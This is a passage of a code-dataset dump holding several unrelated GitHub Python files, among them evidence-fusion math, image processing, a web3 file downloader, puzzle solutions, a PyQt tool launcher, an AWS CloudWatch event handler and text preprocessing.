-torch.sum(e * torch.log(e), dim=-1)\n E_d = E_d / E_d.sum()\n\n alpha = credible_mask * torch.exp(-E_d) + incredible_mask * torch.exp(-(torch.max(E_d) + 1 - E_d))\n w = torch.unsqueeze(alpha / alpha.sum(), dim=0)\n\n e_ = torch.sum(w.T * e, dim=0)\n e_ = e_ / e_.sum()\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict_torch(result, e_))\n\n return result\n\n\ndef contrast_algorithm_bai_torch(e: torch.Tensor, b=10):\n import pyemd\n\n distance_matrix = (np.ones((b, b)) - np.identity(b)) * np.sqrt(2)\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = pyemd.emd(e[i].numpy().astype(np.float64), e[j].numpy().astype(np.float64), distance_matrix)\n\n sim_matrix = torch.exp(-dis_matrix)\n\n sup = sim_matrix.sum(dim=-1) - 1\n\n w_crd = sup / sup.sum()\n\n E_d = -torch.sum(e * torch.log(e), dim=-1)\n\n m_plus = e[torch.argmin(E_d)]\n m_minus = e[torch.argmax(E_d)]\n\n bmd_max = pyemd.emd(m_plus.numpy().astype(np.float64), m_minus.numpy().astype(np.float64), distance_matrix)\n D_minus = torch.zeros((e.shape[0],))\n for i in range(e.shape[0]):\n D_minus[i] = pyemd.emd(e[i].numpy().astype(np.float64), m_minus.numpy().astype(np.float64), distance_matrix)\n\n chi_minus = D_minus / bmd_max\n true_mask = chi_minus <= 0.75\n false_mask = chi_minus > 0.75\n I = chi_minus * true_mask + (1 - chi_minus) * false_mask\n\n w_dist = I / I.sum()\n\n W = w_dist * w_crd\n W = W / W.sum()\n W = torch.unsqueeze(W, dim=0)\n\n e_ = torch.sum(W.T * e, dim=0)\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict_torch(result, e_)\n\n return result\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n a = np.asarray([1.04e-6, 4.20e-5, 1.09e-2, 4.00e-1, 1.23e-2, 5.71e-1, 3.16e-3, 2.05e-3, 1.56e-5, 1.20e-5])\n b = np.asarray([6.61e-6, 1.37e-5, 7.01e-5, 7.34e-3, 1.01e-5, 9.92e-1, 5.03e-5, 1.27e-5, 5.70e-6, 3.66e-6])\n c = np.asarray([2.22e-8, 1.97e-7, 4.99e-4, 6.07e-1, 1.29e-4, 3.84e-1, 7.93e-3, 1.02e-4, 8.10e-8, 6.29e-6])\n\n cos_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='cos',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n cos_result_torch = ds_fusion_torch(torch.from_numpy(np.asarray([a, b, c])), distance='cos',\n beta=torch.from_numpy(np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]])),\n W=torch.from_numpy(np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]])))\n\n js_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='js',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n bd_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='bd',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n zhang_result = contrast_algorithm_zhang(np.asarray([a, b, c]))\n\n jiang_result = contrast_algorithm_jiang(np.asarray([a, b, c]))\n\n # bai_result = contrast_algorithm_bai_torch(torch.from_numpy(np.asarray([a, b, c])))\n bai_result = contrast_algorithm_Bai(np.asarray([a, b, c]))\n\n print(cos_result, 
js_result, bd_result, zhang_result, jiang_result, bai_result, sep='\\n')\n\n entropy_list = [entropy(jiang_result, jiang_result),\n entropy(bai_result, bai_result),\n entropy(cos_result, cos_result),\n entropy(js_result, js_result),\n entropy(bd_result, bd_result),\n ]\n prob_list = [\n jiang_result.max(),\n bai_result.max(),\n cos_result.max(),\n js_result.max(),\n bd_result.max(),\n ]\n\n l = [i for i in range(5)]\n\n plt.bar(l, prob_list, color='yellow', label='probability', alpha=0.5, width=0.5)\n plt.xlabel(\"methods\")\n plt.ylabel(\"probability\")\n plt.legend(loc=\"upper left\")\n plt.ylim([0, 1])\n\n ax1 = plt.twinx()\n ax1.plot(l, entropy_list, 'r', marker='.', label='entropy')\n ax1.set_ylabel(\"entropy\")\n ax1.set_ylim([0, 1])\n plt.legend(loc=\"upper right\")\n\n for i, en in zip(l, entropy_list):\n plt.text(i, en, '%.3f'%en, ha='center', va='bottom', fontsize=12)\n\n plt.xticks(l, [\"Jiang's\", \"Bai's\", \"ours(cos)\", \"ours(js)\", \"ours(bhattacharyya)\"])\n plt.show()\n","repo_name":"OneDrop29/Improved-Label-Fusion-Method-Based-on-D-S-Evidence-Theory-Using-Subjective-and-Objective-Weights","sub_path":"fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":14587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73525861889","text":"#!/usr/bin/python3\n\n# Importing Modules\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.misc import imread, imsave\n\n# Authorship Information\n__author__ = \"Harsh Bhate\"\n__email__ = \"bhate@gatech.edu\"\n\ndef load_image(file_path=\"inputPS0Q2.png\"):\n \"\"\"Load image to a matrix\n Parameters\n ----------\n file_path : str (optional)\n The file path to load image\n Returns\n -------\n image : np.array\n A np.array matrix\n \"\"\"\n return imread(file_path)\n\ndef switch_channels(image):\n \"\"\"Switch the Red and Green channels\n Parameters\n ----------\n image : np.array\n A np.array matrix\n Returns\n -------\n swap_image : np.array\n A swapped np.array matrix\n \"\"\"\n return np.dstack([image[:,:,1], image[:,:,0], image[:,:,2]])\n\ndef save_image(image, file_name):\n \"\"\"Saves Image to file\n Parameters\n ----------\n image : np.array\n The image matrix\n file_name : str\n Path to save the file\n \"\"\"\n imsave(file_name, image)\n\ndef rgb2gray(image):\n \"\"\"Converts RGB to grayscale\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n gray_image : np.array\n The grayscale image\n \"\"\"\n return np.uint8(np.dot(image[..., :3], [0.2989, 0.5870, 0.1140]))\n\ndef negative_image(image):\n \"\"\"Creates an image negative\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n neg_image : np.array\n The negative image\n \"\"\"\n max_pixel = np.max(image)\n return np.uint8(max_pixel - image)\n\ndef mirror_image(image):\n \"\"\"Creates mirror image\n Parameters\n ----------\n image : np.array\n The image matrix\n Returns\n -------\n flip_image : np.array\n The mirror image\n \"\"\"\n return image[:, ::-1]\n\ndef avg_image(gray_image, mirror_image):\n \"\"\"Averages image and mirror_image\n Parameters\n ----------\n image : np.array\n The image matrix\n mirror_image : np.array\n The mirror image\n Returns\n -------\n avg_img : np.array\n The average image\n \"\"\"\n gray_image = gray_image/255.0\n mirror_image = mirror_image/255.0\n return np.uint(((gray_image+mirror_image)/2.0)*255.0)\n\ndef generate_noise(size):\n \"\"\"Generates noise\n Parameters\n ----------\n size : 
tuple(int)\n The size of noise\n Returns\n -------\n noice : np.array\n The noise matrix\n \"\"\"\n return np.random.rand(size[0], size[1])\n\ndef add_noise(image, noise):\n \"\"\"Adds noise to image\n Parameters\n ----------\n image : np.array\n The input image\n noise : np.array\n The noise matrix\n Returns\n -------\n noised_image : np.array\n The noised_image\n \"\"\"\n normalized_image = image/255.0\n return np.uint8((normalized_image + noise)/2.0 * 255.0)\n\nif __name__==\"__main__\":\n # Loading Image\n img = load_image()\n # Problem 1\n swapped_img = switch_channels(img)\n save_image(swapped_img, \"swapImgPS0Q2.png\")\n # Problem 2\n gray_img = rgb2gray(img)\n save_image(gray_img, \"grayImgPS0Q2.png\")\n # Problem 3\n # Subproblem (a)\n neg_img = negative_image(gray_img)\n save_image(neg_img, \"negativeImgPS0Q2.png\")\n # Subproblem (b)\n flip_img = mirror_image(gray_img)\n save_image(flip_img, \"mirrorImgPS0Q2.png\")\n # Subproblem (c)\n avg_img = avg_image(gray_img, flip_img)\n save_image(avg_img, \"avgImgPS0Q2.png\")\n # Subproblem (d)\n noise = generate_noise(gray_img.shape)\n noised_img = add_noise(gray_img, noise)\n save_image(noised_img, \"addNoiseImgPS0Q2.png\")\n # Testing\n # Plotting \n # Settings for LaTeX rendering\n # Please comment if your system does not have a native \n # LaTeX rendering software\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.rc('xtick', labelsize=10) \n plt.rc('ytick', labelsize=10) \n font = {'family' : 'serif', 'size' : 12}\n plt.rc('font', **font)\n # Plots\n fig, axs = plt.subplots(3,2)\n # Subplot 1\n axs[0,0].imshow(swapped_img)\n axs[0,0].set_title(r'Image with Swapped Channels')\n # Subplot 2\n axs[0,1].imshow(gray_img, cmap=\"gray\")\n axs[0,1].set_title(r'Gray Scale Image')\n # # Subplot 3\n axs[1,0].imshow(neg_img, cmap=\"gray\")\n axs[1,0].set_title(r'Negative Image') \n # # Subplot 4\n axs[1,1].imshow(flip_img, cmap=\"gray\")\n axs[1,1].set_title(r'Mirror Image') \n # Subplot 5\n axs[2,0].imshow(avg_img, cmap=\"gray\")\n axs[2,0].set_title(r'Image averaged with its mirror') \n # Subplot 6\n axs[2,1].imshow(noised_img, cmap=\"gray\")\n axs[2,1].set_title(r'Noised Image') \n \n # Labels\n fig.suptitle(r'\\textbf{Image Transformations}')\n # Display plot\n plt.show()\n","repo_name":"bhateharsh/computer_vision","sub_path":"ps_0/PS0Q2.py","file_name":"PS0Q2.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"1809082522","text":"from web3 import Web3\nfrom web3.exceptions import ContractLogicError\n\n# how tf does this fix\nfrom web3.middleware import geth_poa_middleware\n\nimport os, sys\nimport hashlib\n\nPRIVATE_KEY = os.environ.get('PRIVATE_KEY')\nPERSONAL_ADDRESS = os.environ.get('ADDRESS')\nRPC_URL = os.environ.get('RPC_URL')\nCHAIN_ID = int(os.environ.get('CHAIN_ID'))\nCHAIN_SCAN_URL = os.environ.get('CHAIN_SCAN_URL')\nCONTRACT_ADDRESS = os.environ.get('CONTRACT_ADDRESS')\nCONTRACT_ABI = os.environ.get('CONTRACT_ABI')\n\nw3 = Web3(Web3.HTTPProvider(RPC_URL))\nw3.middleware_onion.inject(geth_poa_middleware, layer=0)\n\ncontractAddress = Web3.toChecksumAddress(CONTRACT_ADDRESS)\ncontractAbi = CONTRACT_ABI\n\ncontract = w3.eth.contract(address=contractAddress, abi=contractAbi)\n\nmyAddress = Web3.toChecksumAddress(PERSONAL_ADDRESS)\nmyKey = PRIVATE_KEY\n\nnonce = w3.eth.getTransactionCount(myAddress)\ncount = 0\n\nfileName = sys.argv[1] if len(sys.argv) > 1 else \"songLarge\"\n\ntransaction = 
contract.functions.getFileInfo(fileName).call()\n\nfileName = transaction[0]\nfileExtension = transaction[1]\nfileArrayLength = transaction[2]\nfileFinalPartLength = transaction[3]\n\nif not os.path.isdir('outputs'):\n os.makedirs('outputs')\n\ndownloadedFileParts = []\n\ndef downloadFileParts(_fileName, _fileArrayIndex, _fileArrayBegin, _fileArrayEnd):\n print('Downloading File Part:', _fileArrayIndex, 'from', _fileArrayBegin, 'to', _fileArrayEnd)\n for i in range(0, _fileArrayEnd - _fileArrayBegin, 500):\n\n print('Processing: ', i + _fileArrayBegin, 'to', _fileArrayBegin + i+500)\n\n endIndex = i + 500 if _fileArrayBegin + i + 500 < _fileArrayEnd else _fileArrayEnd - _fileArrayBegin\n\n print('Indexing: ', i, 'to', endIndex)\n\n transaction = contract.functions.getFileArray(fileName, _fileArrayIndex, i, endIndex).call()\n\n downloadedFileParts.append(b''.join(transaction))\n\nif fileArrayLength > 1:\n for i in range(0, fileArrayLength - 1):\n downloadFileParts(fileName, i, i * 10000, (i + 1) * 10000)\n downloadFileParts(fileName, fileArrayLength - 1, (fileArrayLength - 1) * 10000, (fileArrayLength - 1) * 10000 + fileFinalPartLength)\nelse:\n downloadFileParts(fileName, 0, 0, fileFinalPartLength - 1)\n\nwith open('outputs/{}.{}'.format(fileName, fileExtension), 'wb') as f:\n for part in downloadedFileParts:\n f.write(part)","repo_name":"johnmiddleton12/storage-dapp","sub_path":"local-scripts/downloadFile.py","file_name":"downloadFile.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11167425650","text":"puzzleinput = r\"\"\"L.LL.LL.LL\nLLLLLLL.LL\nL.L.L..L..\nLLLL.LL.LL\nL.LL.LL.LL\nL.LLLLL.LL\n..L.L.....\nLLLLLLLLLL\nL.LLLLLL.L\nL.LLLLL.LL\"\"\"\n\n\ndef occupied_dir(grid,r,c,dr,dc) :\n r += dr\n c += dc\n while 0 <= r < len(grid) and 0 <= c < len(grid[0]) :\n if grid[r][c] == \"#\" :\n return True\n if grid[r][c] == \"L\" :\n return False\n r += dr\n c += dc\n return False\n \n\ndef num_occupied(grid,r,c) :\n count = 0\n for dr,dc in [(-1,-1),(-1,0),(-1,+1),(0,-1),(0,+1),(+1,-1),(+1,0),(+1,+1)] :\n if occupied_dir(grid,r,c,dr,dc) :\n count += 1\n return count\n\ngrid = [[x for x in line] for line in (puzzleinput.splitlines())]\ndef iterate() :\n global grid\n newgrid = [[\".\" for x in range(len(grid[0]))] for x in range(len(grid))]\n changed = False\n for r in range(len(grid)) :\n for c in range(len(grid[0])) :\n if grid[r][c] == \"L\" :\n if num_occupied(grid,r,c) == 0:\n changed = True\n newgrid[r][c] = \"#\"\n else :\n newgrid[r][c] = \"L\"\n if grid[r][c] == \"#\" :\n if num_occupied(grid,r,c) >= 5:\n changed = True\n newgrid[r][c] = \"L\"\n else :\n newgrid[r][c] = \"#\"\n grid = newgrid\n return changed\nwhile iterate() :\n pass\ncount = 0\nfor row in grid :\n for seat in row :\n if seat == \"#\" :\n count += 1\nprint(count)\n","repo_name":"chambost/competitions","sub_path":"adventofcode.com/2020/day11/day11b_AoC_2020.py","file_name":"day11b_AoC_2020.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2971261966","text":"#!/usr/bin/python\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtGui import QApplication\nfrom source.mainwindow import MainWindow\nfrom source.choosefootprint import ChooseFootprintDialog\n\nimport ConfigParser\n\ndef main():\n from source import dbfunctions\n import MySQLdb\n import sys\n \n app = 
QApplication(sys.argv)\n #app.setStyle(\"cleanlooks\")\n #plastique\n #cde\n #motif\n #sgi\n #windows\n #cleanlooks\n #mac\n \n conf = ConfigParser.ConfigParser()\n conf.read(\"connections.conf\")\n \n db = MySQLdb.connect(host=\"localhost\", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))\n db.autocommit(True)\n \n cursor = db.cursor()\n cursor.execute(\"select footprint_name from footprints order by footprint_name\")\n \n footprints_list = [ \"\" ]\n for row in cursor.fetchall():\n footprints_list.append(row[0])\n \n cursor.close()\n \n cftwnd = ChooseFootprintDialog()\n cftwnd.setFootprints(footprints_list)\n if cftwnd.exec_():\n footprintName, doWork, options = cftwnd.getResults()\n \n footprintID = dbfunctions.createFootprint(db, footprintName)\n \n wnd = MainWindow()\n wnd.setWindowTitle(\"autodane : {0}\".format(footprintName))\n wnd.setFootprintInfo(db, footprintID, footprintName, doWork, options)\n wnd.show()\n wnd.start()\n\n logoPixmap = QtGui.QPixmap(QString.fromUtf8('images/logo.png'))\n logoScaledPixmap = logoPixmap.scaled(wnd.lblSensePostLogo.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblSensePostLogo.setPixmap(logoScaledPixmap)\n \n emailPixmap = QtGui.QPixmap(QString.fromUtf8('images/email.png'))\n emailScaledPixmap = emailPixmap.scaled(wnd.lblEmailIcon.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblEmailIcon.setPixmap(emailScaledPixmap)\n \n emailScaledPixmap = emailPixmap.scaled(wnd.lblEmailIcon2.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblEmailIcon2.setPixmap(emailScaledPixmap)\n \n skypePixmap = QtGui.QPixmap(QString.fromUtf8('images/skype.png'))\n skypeScaledPixmap = skypePixmap.scaled(wnd.lblSkypeLogo.size(), QtCore.Qt.KeepAspectRatio)\n wnd.lblSkypeLogo.setPixmap(skypeScaledPixmap)\n else:\n quit()\n\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()\n","repo_name":"danegoodwin/autodane","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"8634699191","text":"\"\"\"\nGiven a real number n, find the square root of n. 
For example, given n = 9, return 3.\n\"\"\"\n# Assuming we have to return an integer value.\ndef mySqrt(x):\n if x == 0:\n return 0\n left, right = 1, x\n while left <= right:\n mid = (left + right) // 2\n squared = mid * mid\n if squared == x:\n return mid\n elif squared > x:\n right = mid - 1\n else:\n left = mid + 1\n return right","repo_name":"anantkaushik/dailycodingproblem","sub_path":"Others/Problem#467.py","file_name":"Problem#467.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"43"} +{"seq_id":"16917115160","text":"import sys\nn, t = map(int, input().split())\nA = [int(x) for x in input().split()]\ndict = {}\nfor i in A:\n if i in dict:\n dict[i] += 1\n else:\n dict[i] = 1\nA.sort()\n\nif t == 1:\n for k, v in dict.items():\n if (7777-k) in dict:\n print(\"Yes\")\n sys.exit(0)\n print(\"No\")\n sys.exit(0)\n\nif t == 2:\n for v in dict.values():\n if v > 1:\n print(\"Contains duplicate\")\n sys.exit(0)\n print(\"Unique\")\n sys.exit(0)\n\nif t == 3:\n lots = []\n for k, v in dict.items():\n if v > n/2:\n lots.append(k)\n if len(lots) > 0:\n for x in lots:\n print(x, end=' ')\n print()\n else:\n print(-1)\n sys.exit(0)\n\nif t == 4:\n median = []\n if n % 2 != 0:\n median.append(A[n//2])\n else:\n median.append(A[n//2-1])\n median.append(A[n//2])\n if len(median) > 0:\n for x in median:\n print(x, end=' ')\n print()\n sys.exit(0)\n\nif t == 5:\n inrange = []\n for k in A:\n if k >= 100 and k <= 999:\n inrange.append(k)\n if len(inrange) > 0:\n for x in inrange:\n print(x, end=' ')\n print()\n","repo_name":"iamvickynguyen/Kattis-Solutions","sub_path":"basic_programming2.py","file_name":"basic_programming2.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"74119307648","text":"# For each loop\n# Same thing as\n# for i in range(0, 5):\nfor i in range(5):\n\tprint(i)\n\n# Reverse for each loop \nfor i in reversed(range(5)):\n\tprint(i)\n###################################################\n\n# Idiomatic examples to traverse lists\nnumbers = ['zero', 'one', 'two', 'three', 'four']\n\n# Traverse in order\nfor num in numbers:\n\tprint(num)\n\t\n# Traverse in reverse order\nfor num in reversed(numbers):\n\tprint(num)\n\t\n# Traverse in order with indices\nfor i, num in enumerate(numbers):\n\tprint(f'{i}->{num}')\n\t\n# Traverse n lists in order in parallel up to the len of the shortest list\ncolors = ['red', 'green', 'blue']\nfor num, color in zip(numbers, colors):\n\tprint(f'{num}->{color}')\n\t\n# Traverse in sorted order\nfor num in sorted(numbers):\n\tprint(num)\n\n# Traverse in key sorted order\nfor num in sorted(numbers, key=len):\n\tprint(f'{num} (len={len(num)})')\n###################################################\n\n# For else\nres = None\nfor i in range(5):\n\tif (i == 5):\n\t\tres = i\n\t\tbreak\nelse: # No break\n\tres = -1\n\t\nprint(res)\n###################################################\n\n# Generator objects\nls = (i**2 for i in range(11))\nfor i in ls:\n\tprint(i)\n\n","repo_name":"kvntng17/pythonic_idioms","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41960393646","text":"import json\nfrom cloudwatch_events.event import Event\n\nclass RDSDBInstanceEvent(Event):\n def __init__(self, event):\n self.region = event.get('region')\n 
self.resources = event.get('resources')\n self.time = event.get('time')\n self.event_categories = event.get('detail').get('EventCategories')\n self.message = event.get('detail').get('Message')\n self.source = event.get('detail').get('SourceIdentifier')\n\n def sensu_result(self):\n status_map = {\n 'failover': 2,\n }\n\n sensu_check = {\n 'name': 'rds_{}'.format(self.source),\n 'source': 'rds.aws',\n 'status': '{}'.format(status_map.get(self.event_categories[0]),1),\n 'output': 'RDS event:{} from {} at {}, manually resolve alert when recovered.'.format(self.event_categories[0], self.soruce, self.time)\n }\n\n return sensu_check\n\n class Factory:\n @staticmethod\n def create(json): return RDSDBInstanceEvent(json)\n\n","repo_name":"af6140/lambba-cloudwatch_to_sensu_result","sub_path":"cloudwatch_events/rds/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15738443117","text":"from __future__ import division\n\ncommoncharacter=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','!','$','%','&','(',')','\\'','\\\"','.',',','?','+','=','-','*','/','0','1','2','3','4','5','6','7','8','9',':',';','#','{','}','[',']','<','>','|','_','\\\\','^','@','~']\nspecial=['`']\nspecialcharacter={\"\\xef\\xbc\\xa1\" : 'A',\n \"\\xef\\xbc\\xa2\" : 'B',\n \"\\xef\\xbc\\xa3\" : 'C',\n \"\\xef\\xbc\\xa4\" : 'D',\n \"\\xef\\xbc\\xa5\" : 'E',\n \"\\xef\\xbc\\xa6\" : 'F',\n \"\\xef\\xbc\\xa7\" : 'G',\n \"\\xef\\xbc\\xa8\" : 'H',\n \"\\xef\\xbc\\xa9\" : 'I',\n \"\\xef\\xbc\\xaa\" : 'J',\n \"\\xef\\xbc\\xab\" : 'K',\n \"\\xef\\xbc\\xac\" : 'L',\n \"\\xef\\xbc\\xad\" : 'M',\n \"\\xef\\xbc\\xae\" : 'N',\n \"\\xef\\xbc\\xaf\" : 'O',\n \"\\xef\\xbc\\xb0\" : 'P',\n \"\\xef\\xbc\\xb1\" : 'Q',\n \"\\xef\\xbc\\xb2\" : 'R',\n \"\\xef\\xbc\\xb3\" : 'S',\n \"\\xef\\xbc\\xb4\" : 'T',\n \"\\xef\\xbc\\xb5\" : 'U',\n \"\\xef\\xbc\\xb6\" : 'V',\n \"\\xef\\xbc\\xb7\" : 'W',\n \"\\xef\\xbc\\xb8\" : 'X',\n \"\\xef\\xbc\\xb9\" : 'Y',\n \"\\xef\\xbc\\xba\" : 'Z',\n \"\\xef\\xbd\\x81\" : 'a',\n \"\\xef\\xbd\\x82\" : 'b',\n \"\\xef\\xbd\\x83\" : 'c',\n \"\\xef\\xbd\\x84\" : 'd',\n \"\\xef\\xbd\\x85\" : 'e',\n \"\\xef\\xbd\\x86\" : 'f',\n \"\\xef\\xbd\\x87\" : 'g',\n \"\\xef\\xbd\\x88\" : 'h',\n \"\\xef\\xbd\\x89\" : 'i',\n \"\\xef\\xbd\\x8a\" : 'j',\n \"\\xef\\xbd\\x8b\" : 'k',\n \"\\xef\\xbd\\x8c\" : 'l',\n \"\\xef\\xbd\\x8d\" : 'm',\n \"\\xef\\xbd\\x8e\" : 'n',\n \"\\xef\\xbd\\x8f\" : 'o',\n \"\\xef\\xbd\\x90\" : 'p',\n \"\\xef\\xbd\\x91\" : 'q',\n \"\\xef\\xbd\\x92\" : 'r',\n \"\\xef\\xbd\\x93\" : 's',\n \"\\xef\\xbd\\x94\" : 't',\n \"\\xef\\xbd\\x95\" : 'u',\n \"\\xef\\xbd\\x96\" : 'v',\n \"\\xef\\xbd\\x97\" : 'w',\n \"\\xef\\xbd\\x98\" : 'x',\n \"\\xef\\xbd\\x99\" : 'y',\n \"\\xef\\xbd\\x9a\" : 'z'}\nspecialsymbol={\"\\xef\\xb9\\x9e\" : ')',\n \"\\xef\\xb9\\x9d\" : '(',\n \"\\xef\\xbd\\x9d\" : '}',\n \"\\xef\\xb9\\x90\" : ',',\n \"\\xef\\xbd\\x80\" : '\\'',\n \"\\xef\\xb9\\xa5\" : '>',\n \"\\xef\\xbc\\x9c\" : '<',\n \"\\xef\\xbc\\x9d\" : '=',\n \"\\xef\\xbc\\x9e\" : '>',\n \"\\xef\\xbc\\x82\" : '\\\"',\n \"\\xef\\xbc\\x84\" : '$',\n \"\\xef\\xbc\\x86\" : '&',\n \"\\xef\\xbc\\x87\" : '\\'',\n \"\\xef\\xbc\\x8a\" : '*',\n \"\\xef\\xbc\\x8b\" : '+',\n \"\\xef\\xbc\\x8d\" : '-',\n \"\\xef\\xbc\\x8f\" : '/',\n \"\\xef\\xbc\\xbb\" : '[',\n 
\"\\xef\\xbc\\xbc\" : '\\\\',\n \"\\xef\\xbc\\xbd\" : ']',\n \"\\xef\\xbc\\xbe\" : '^',\n \"\\xef\\xbc\\xbf\" : '_',\n \"\\xef\\xbc\\xa0\" : '@',\n \"\\xef\\xbc\\x83\" : '#'}\nspecialunit3=['\\xef\\xbf\\xa5','\\xef\\xbf\\xa1','\\xef\\xbf\\xa0']\nspecialunit2=[]#'\\xc2\\xb0'\n\ndef processline(line):\n line=line.split(' ')\n if 'http' in line and ':' in line:\n return \"\",True\n skip=False\n for j,word in enumerate(line):\n word=word.replace('\\\\/','/')\n line[j]=word\n for i in range(len(word)):\n if not word[i] in commoncharacter:\n if word[i] in special:\n re=line[j]\n re=re[0:i]+'\\''+re[i+1:]\n line[j]=re\n elif len(word)>=2+i:\n if word[i:i+2] in specialunit2:\n pass\n elif len(word)>=3+i:\n if word[i:i+3] in specialcharacter:\n re=line[j]\n re=re[0:i]+specialcharacter[word[i:i+3]]+re[i+3:]\n line[j]=re\n #elif word[i:i+3] in specialsymbol:\n # re=line[j]\n # re=re[0:i]+specialsymbol[word[i:i+3]]+re[i+3:]\n # line[j]=re\n # print l2\n elif word[i:i+3] in specialunit3:\n pass\n else:\n skip=True\n else:\n skip=True\n else:\n pass\n return line,skip\n\ndef preprocess(src_dir,trg_dir,out_dir,out_file_name,abandon_same_corpus=True):\n s=set()\n with open(src_dir,'r') as f:\n with open(trg_dir,'r') as f1:\n with open(out_dir+out_file_name+'.src.p','w') as f2:\n with open(out_dir+out_file_name+'.trg.p','w') as f3:\n with open(out_dir+out_file_name+'.src.q','w') as f4:\n with open(out_dir+out_file_name+'.trg.q','w') as f5:\n for l1,l2 in zip(f.readlines(),f1.readlines()):\n l1=l1[:-1]\n l2=l2[:-1]\n if abandon_same_corpus and l1==l2:\n continue\n\n line1,skip=processline(l1)\n if skip:\n f4.write(l1+'\\n')\n f5.write(l2+'\\n')\n continue\n \n line2,skip=processline(l2)\n if skip:\n f4.write(l1+'\\n')\n f5.write(l2+'\\n')\n continue\n \n line1=' '.join(line1)\n line2=' '.join(line2)\n if line1+line2 in s:\n continue\n else:\n s.add(line1+line2)\n\n f2.write(line1+'\\n')\n f3.write(line2+'\\n')\n\nimport sys\nif not len(sys.argv)==6:\n exit()\nb=False\nif sys.argv[5]=='True':\n b=True\npreprocess(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],b)\n","repo_name":"blcuicall/gec-data-synthesis","sub_path":"data/scripts/preprocess_traindata.py","file_name":"preprocess_traindata.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"11611579625","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\r\n# SPDX-License-Identifier: MIT\r\n\r\nimport pyrebase\r\nimport time\r\nfrom time import sleep\r\nimport board\r\nimport adafruit_dht\r\n#!/usr/bin/env python3\r\nimport RPi.GPIO as GPIO # import GPIO\r\nfrom hx711 import HX711 # import the class HX711\r\n\r\n\r\n\r\n\r\n# Initial the dht device, with data pin connected to:\r\ndhtDevice = adafruit_dht.DHT22(board.D4)\r\n\r\n# you can pass DHT22 use_pulseio=False if you wouldn't like to use pulseio.\r\n# This may be necessary on a Linux single board computer like the Raspberry Pi,\r\n# but it will not work in CircuitPython.\r\n# dhtDevice = adafruit_dht.DHT22(board.D18, use_pulseio=False)\r\n\r\n\r\n \r\n \r\n\r\nconfig = {\r\n # You can get all these info from the firebase website. 
